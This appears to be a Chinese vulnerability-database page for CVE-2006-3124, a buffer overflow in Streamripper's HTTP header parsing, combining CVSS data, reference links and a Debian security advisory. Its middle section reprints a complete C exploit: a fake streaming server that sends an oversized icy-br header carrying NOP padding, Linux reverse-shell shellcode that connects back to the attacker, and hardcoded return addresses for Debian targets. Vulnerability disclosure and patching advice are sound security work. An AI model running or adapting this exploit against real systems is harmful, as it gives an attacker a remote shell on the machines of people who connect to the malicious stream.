CVE-2006-3124
CVSS7.5
发布时间 :2006-08-26 17:04:00
修订时间 :2011-03-07 21:37:52
NMCOEPS    

[原文]Buffer overflow in the HTTP header parsing in Streamripper before 1.61.26 allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted HTTP headers.


[CNNVD]Streamripper HTTP头字段解析缓冲区溢出漏洞(CNNVD-200608-420)

        StreamRipper能够将网上的MP3流媒体保存到硬盘中,特别适合录制网络MP3广播。
        StreamRipper在处理服务器返回的某些HTTP头字段时存在缓冲区溢出,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
        如果用户受骗访问了攻击设置的恶意服务器的话就可能触发这个漏洞,导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:streamripper:streamripper:1.61.25
cpe:/a:streamripper:streamripper:1.61.24

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3124
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3124
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-420
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/19707
(PATCH)  BID  19707
http://sourceforge.net/project/shownotes.php?release_id=442126
(PATCH)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=442126
http://secunia.com/advisories/21579
(VENDOR_ADVISORY)  SECUNIA  21579
http://xforce.iss.net/xforce/xfdb/28567
(UNKNOWN)  XF  streamripper-httpheader-bo(28567)
http://www.vupen.com/english/advisories/2006/3387
(UNKNOWN)  VUPEN  ADV-2006-3387
http://www.novell.com/linux/security/advisories/2006_21_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2006:021
http://www.debian.org/security/2006/dsa-1158
(UNKNOWN)  DEBIAN  DSA-1158
http://security.gentoo.org/glsa/glsa-200609-01.xml
(UNKNOWN)  GENTOO  GLSA-200609-01
http://secunia.com/advisories/21801
(UNKNOWN)  SECUNIA  21801
http://secunia.com/advisories/21658
(UNKNOWN)  SECUNIA  21658
http://www.osvdb.org/28178
(UNKNOWN)  OSVDB  28178
http://secunia.com/advisories/21749
(UNKNOWN)  SECUNIA  21749
http://downloads.securityfocus.com/vulnerabilities/exploits/streamripper-aug292006.c
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/streamripper-aug292006.c

- 漏洞信息

Streamripper HTTP头字段解析缓冲区溢出漏洞
高危 缓冲区溢出
2006-08-26 00:00:00 2006-09-19 00:00:00
远程  
        StreamRipper能够将网上的MP3流媒体保存到硬盘中,特别适合录制网络MP3广播。
        StreamRipper在处理服务器返回的某些HTTP头字段时存在缓冲区溢出,远程攻击者可能利用此漏洞在用户机器上执行任意指令。
        如果用户受骗访问了攻击设置的恶意服务器的话就可能触发这个漏洞,导致执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://sourceforge.net/project/showfiles.php?group_id=6172

- 漏洞信息 (2274)

Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit (EDBID:2274)
linux remote
2006-08-29 Verified
0 Expanders
N/A [点击下载]
/*
       _______         ________           .__        _____          __
___  __\   _  \   ____ \_____  \          |  |__    /  |  |   ____ |  | __
\  \/  /  /_\  \ /    \  _(__  <   ______ |  |  \  /   |  |__/ ___\|  |/ /
 >    <\  \_/   \   |  \/       \ /_____/ |   Y  \/    ^   /\  \___|    <
/__/\_ \\_____  /___|  /______  /         |___|  /\____   |  \___  >__|_ \
      \/      \/     \/       \/   29\08\06    \/      |__|      \/     \/
      
 *   mm.           dM8
 *  YMMMb.       dMM8      _____________________________________
 *   YMMMMb     dMMM'     [                                     ]
 *    `YMMMb   dMMMP      [ There are doors I have yet to open  ]
 *      `YMMM  MMM'       [ windows I have yet to look through  ]
 *         "MbdMP         [ Going forward may not be the answer ]
 *     .dMMMMMM.P         [                                     ]
 *    dMM  MMMMMM         [       maybe I should go back        ]
 *    8MMMMMMMMMMI        [_____________________________________]
 *     YMMMMMMMMM                   www.netbunny.org
 *       "MMMMMMP
 *      MxM .mmm
 *      W"W """

[i] Title:              Streamripper HTTP Header Parsing Buffer Overflow Exploit
[i] Discovered by:      Ulf Harnhammar
[i] Exploit by:         Expanders
[i] References:         http://www.securityfocus.com/bid/19707   ---   http://streamripper.sourceforge.net/
[i] Greatings:          x0n3-h4ck - netbunny - my girlfriend..thanks for existing

[ Why streamripper crash? ]

Streamripper like any other shoutcast client send an HTTP GET request to the stream server then receive a pseudo-HTTP response.
Response is made of a ICY [CODE] that show the status of the remote daemon, and a few icy- headers that stores radio informations
like Title - Website - Genre - Bitrate and a special header for song-title offset in the content stream.

in lib/http.c [httplib_parse_sc_header()]

[code segment]
....
char stempbr[50];
....
rc = extract_header_value(header, stempbr, "icy-br:");
....
[/code segment]

extract_header_value(...) calls subnstr_until(const char *str, char *until, char *newstr, int maxlen) that copies from [*str] to [*newstr] trimming
everything next [*until] for a maximum of [maxlen] bytes.

in streamripper-1.61.25 ( maybe prior versions ) MAX_ICY_STRING  costant is passed as [maxlen].

in lib/lib/srtypes.h

#define MAX_ICY_STRING          4024

Putting all together if we send an icy-br: header 156 byte long we reach EIP overwriting.

Code Execution is obvious possible.

[ Timeline ]

Vendor has been informed and version 1.61.26 has been released.

[ Notes ]

Exploit uses shitty hardcoded adresses, there's no registers that point to an usefull location so virtual address exploiting isn't possible.
Probably some better solution can be used but i'm really to lazy and busy to fuck my mind with that.

[ Links ]

www.x0n3-h4ck.org
www.netbunny.org



*/

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define BUFFSIZE 200 // Buffer size

int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );


/* linux_ia32_reverse -  Size=70 Encoder=None( hahaha streaming has no restricted 0x00 ) http://metasploit.com */
unsigned char shellcode[] =
                      "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
                      "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68"
                      "\x00\x00\x00\x00" // IP
                      "\x66\x68"
                      "\x00\x00" // PORT
                      "\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
                      "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
                      "\x89\xe1\xb0\x0b\xcd\x80";

char http_header[] =  "ICY 200 OK\r\n"
                      "icy-notice1:<BR>This stream requires <a href=\"http://www.winamp.com/\">Winamp</a><BR>\r\n"
                      "icy-notice2:SHOUTcast Distributed Network Audio Server/unix v1.9.7<BR>\r\n"
                      "icy-name:SEGFAULT radio\r\n"
                      "icy-genre:Progressive House\r\n"
                      "icy-url:http://www.x0n3-h4ck.org\r\n"
                      "content-type:audio/mpeg\r\n"
                      "icy-pub:1\r\n"
                      "icy-metaint:1\r\n" // mp3 metatags starts at first byte of content
                      "icy-br:"; // Finally here...

char http_content[] = "\x0d\x0a\x0d\x0a" // \r\n\r\n
                      "\x04" // this magic byte can be used to control malloc(m_buffersize). m_buffersize is (this-byte * 16 ) TODO: egghunter
                      "\x53\x74\x72\x65\x61\x6D\x54\x69\x74\x6C\x65\x3D\x27\x45"
                      "\x78\x70\x61\x6E\x64\x65\x72\x73\x20\x2D\x20\x49\x27\x6C"
                      "\x6C\x20\x4F\x77\x6E\x20\x59\x6F\x75\x27\x3B\x53\x74\x72"
                      "\x65\x61\x6D\x55\x72\x6C\x3D\x27\x27\x3B\x00\x00\x00\x00"
                      "\x00\x00\x00\x00\x00\x00\x00\x00"
                      "\xd3\xff\xff\xf5\xff\xff\xf9\xaf\xff\xe5\x29\xbe\x3e\x8b\x18"; // a few bytes from an mp3


struct retcodes{char *platform;unsigned long addr;} targets[]= {
        { "Debian GNU/Linux testing/unstable"   , 0xb7e70090 },
	{ "Debian GNU/Linux 3.1", 0xb7e71070 },
	{ "Crash daemon - DEBUGGING"   , 0xdeadc0de },
	{ NULL }
};
int banner() {
  printf("\n[i] Title:        \tStreamripper HTTP Header Parsing BOF Exploit\n");
  printf("[i] Discovered by:\tUlf Harnhammar\n");
  printf("[i] Exploit by:   \tExpanders\n\n");
  return 0;
}

int usage(char *filename) {
  int i;
  printf("Usage: \t%s <port> <l_ip> <l_port> <targ>\n\n",filename);
  printf("       \t<port>   : Local port for listener  ::  Default: 8000\n");
  printf("       \t<l_ip>   : Local ip address for connectback\n");
  printf("       \t<l_port> : Local port for connectback\n");
  printf("       \t<targ>   : Target from the list below\n\n");
  
  printf("#   \t Address  \t Target\n");
  printf("---------------------------------------------------------\n");
  for(i = 0; targets[i].platform; i++)
        printf("%d \t 0x%08x \t %s \n",i,targets[i].addr,targets[i].platform);
  printf("---------------------------------------------------------\n");
  exit(0);
}

int inject(char *port, char *ip)
{
    unsigned long m_ip;
    unsigned short m_port;
    m_ip = inet_addr(ip);
    m_port = htons(atoi( port ));
    memcpy ( &shellcode[26], &m_ip, 4);
    memcpy ( &shellcode[32], &m_port, 2);
    return 0;
}

int socket_listen( unsigned short port )
{
  int s,reuseaddr=1;
  struct sockaddr_in localaddr;
  struct hostent* host_addr;

  localaddr.sin_family = AF_INET;
  localaddr.sin_port = htons(port);
  localaddr.sin_addr.s_addr = INADDR_ANY;
  bzero(&(localaddr.sin_zero), 8);

  if ( ( s = socket(AF_INET, SOCK_STREAM, 0) ) < 0 )
  {
   printf ( "[X] socket() failed!\n" );
   exit ( 1 );
  }
  if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,(socklen_t)sizeof(reuseaddr)) < 0)
  {
   printf("[X] setsockopt() failed!\n");
   exit ( 1 );
  }
  if (bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) 
  {
   perror("[X] bind() failed\n");
   exit ( 1 );
  }
  if (listen(s, 1) < 0)
  {
   perror("[X] listen() failed\n");
   exit ( 1 );
  }
  return ( s );
}

int client_accept( int listener )
{
  int s;
  struct sockaddr_in remoteaddr;
  int addrlen = sizeof(struct sockaddr_in);
  if ((s = accept(listener, (struct sockaddr *)&remoteaddr, &addrlen)) < 0)
  {
   perror("[X] accept() failed\n");
   exit ( 1 );
  }
  if (getpeername(s, (struct sockaddr *)&remoteaddr, &addrlen) < 0)
  {
   perror("[X] getpeername() failed\n");
   exit ( 1 );
  }
  printf("got connection from %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));
  return ( s );
}


int main(int argc, char *argv[]) {
    int listener,client,position=0;
    unsigned int rcv;
    char buffer[BUFFSIZE],*request;
    char recvbuf[256];
    banner();
    if( (argc != 5) || (atoi(argv[1]) < 1) || (atoi(argv[1]) > 65534) )
        usage(argv[0]);

    printf("[+] Creating evil buffer\n");
    request = (char *) malloc(BUFFSIZE + strlen(http_header) + strlen(http_content)); //  +3 == \r + \n + 0x00
    memset(buffer,0x90,BUFFSIZE);  // Fill with nops

    inject(argv[3],argv[2]);     // Xor port and ip and put them into the shellcode

    position = 156 - strlen(shellcode);   // 156 : EIP offset
    memcpy(buffer+position,shellcode,strlen(shellcode));
    position += strlen(shellcode);
    memcpy(buffer+position,&targets[atoi(argv[4])].addr,4);
    position += 4;
    memset(buffer+position,0x00,1); // End
    sprintf(request,"%s%s%s",http_header,buffer,http_content);

    printf("[+] Setting up socket\n");
    listener = socket_listen(atoi(argv[1]));
    
    printf("[+] Waiting for client...");
    fflush(stdout);
    client = client_accept(listener);
    
    printf("[+] Receiving GET request...");
    fflush(stdout);
    rcv=recv(client,recvbuf,256,0);
    if(rcv<0)
    {
     printf("\n[X] Error while recieving banner!\n");
     close(client);
     close(listener);
     exit( 1 );
    }
    if (strstr(recvbuf,"1.61.25")!=0)
    {
     sleep(1);
     printf("ok\n[+] Sending %d bytes of painfull buffer\n",strlen(request));
     if ( send ( client, request, strlen (request), 0) <= 0 )
     {
            printf("[X] Failed to send buffer\n");
            exit ( 1 );
     }
     printf("[+] Done - Wait for shell on port %s\n",argv[3]);
    } else
      printf("[X] This client is not running Streamripper or it's an unsupported version\n");
    close(client);
    close(listener);
    free(request);
    return 0;
}

// milw0rm.com [2006-08-29]
		

- 漏洞信息 (F49490)

Debian Linux Security Advisory 1158-1 (PacketStormID:F49490)
2006-08-28 00:00:00
Debian  debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2006-3124
[点击下载]

Debian Security Advisory 1158-1 - Ulf Harnhammer from the Debian Security Audit Project discovered that streamripper, a utility to record online radio-streams, performs insufficient sanitizing of data received from the streaming server, which might lead to buffer overflows and the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1158-1                    security@debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
August 25th, 2006                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : streamripper
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3124

Ulf Harnhammer from the Debian Security Audit Project discovered that
streamripper, a utility to record online radio-streams, performs
insufficient sanitising of data received from the streaming server,
which might lead to buffer overflows and the execution of arbitrary
code.

For the stable distribution (sarge) this problem has been fixed in
version 1.61.7-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 1.61.25-2.

We recommend that you upgrade your streamripper package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1.dsc
      Size/MD5 checksum:      684 81c2011992a47019464e689e62a0e2fc
    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1.diff.gz
      Size/MD5 checksum:     2748 a55c6752bf1f5cd184516e018f7b1d5b
    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7.orig.tar.gz
      Size/MD5 checksum:   245448 87e16d42fb7625525eafe769edd2e9b3

  Alpha architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_alpha.deb
      Size/MD5 checksum:    62730 a11cd910042103cd75a229468e786a25

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_amd64.deb
      Size/MD5 checksum:    55886 93a8ab72c2a969b8eee99c9e105d8ad1

  ARM architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_arm.deb
      Size/MD5 checksum:    51734 3d19a4711f9373be5630e1024f515ddc

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_i386.deb
      Size/MD5 checksum:    51694 cb59ef062ca1ca0c74a5b7359d2b5acd

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_ia64.deb
      Size/MD5 checksum:    68218 ff13f983398a4694350916f4d44a817c

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_hppa.deb
      Size/MD5 checksum:    57016 aad39a310b38f131840929345cf50d6b

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_m68k.deb
      Size/MD5 checksum:    47922 a19ab1dd7fb150ae73fce92e519ab94e

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_mips.deb
      Size/MD5 checksum:    57088 b90697a7aecf7c2d838bdfae4af1ccc5

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_mipsel.deb
      Size/MD5 checksum:    57490 0f1fbaeeec94a7f4c4d1340e68d611bb

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_powerpc.deb
      Size/MD5 checksum:    55912 b2590326f71ddb6f9bf44fc933b28c50

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_s390.deb
      Size/MD5 checksum:    55456 60afcd68f13f131040c68cde36f4464a

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.7-1sarge1_sparc.deb
      Size/MD5 checksum:    51266 73736226d97be58202e1619518e3ae25


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFE8fpPXm3vHE4uyloRAh3jAKC8gR3uGCnV1O0j8d0usIMdSvUdIwCgySom
345IV3yRd0ZZ+Ql1Bsn3HCg=
=XMei
-----END PGP SIGNATURE-----








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

28178
Streamripper HTTP Header Parsing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in Streamripper. The product fails to check for boundary errors while processing certain HTTP headers resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.

- 时间线

2006-08-24 Unknow
2006-08-24 Unknow

- 解决方案

Upgrade to version 1.61.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Streamripper HTTP Header Parsing Buffer Overflow Vulnerability
Boundary Condition Error 19707
Yes No
2006-08-25 12:00:00 2006-10-17 11:19:00
Ulf Harnhammar discovered this issue.

- 受影响的程序版本

Streamripper Streamripper 1.61.25
Streamripper Streamripper 1.61.24
Streamripper Streamripper 1.61.17
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Streamripper Streamripper 1.61.26

- 不受影响的程序版本

Streamripper Streamripper 1.61.26

- 漏洞讨论

Streamripper is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input data before copying it to an insufficiently sized memory buffer.

An attacker may cause malicious code to execute by forcing the application to parse malformed HTTP headers, with the privileges of the user running the application.

- 漏洞利用

The following exploit code is available:

- 解决方案

The vendor has released version 1.61.26 to address this issue.

Please see the referenced advisories for more information.


Streamripper Streamripper 1.61.17

Streamripper Streamripper 1.61.24

Streamripper Streamripper 1.61.25

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站